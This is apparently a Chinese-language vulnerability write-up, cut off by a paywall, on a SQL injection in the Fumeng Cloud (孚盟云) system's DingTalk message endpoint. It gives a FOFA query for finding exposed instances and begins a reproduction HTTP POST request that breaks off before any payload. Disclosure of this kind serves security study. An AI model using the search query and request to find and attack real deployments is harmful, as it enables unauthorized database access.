免责声明
请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、简介
孚盟云产品通过云模式为用户提供信息化管理服务,使异地办公更加高效便捷,并大幅降低中小企业的信息化建设成本。中小企业可以以较小的投入,享受与大型企业相媲美的服务,建立完整的网络硬件配置、内部流程管理和快速通关的综合解决方案。
二、漏洞描述
孚盟云系统在/Ajax/AjaxSendDingdingMessage接口处对于用户提交的参数未做过滤直接拼接到sql语句中执行,导致可被进行sql注入攻击。
三、fofa语法
body="hidLicResult" && body="hidProductID"
四、漏洞复现
POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,e
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
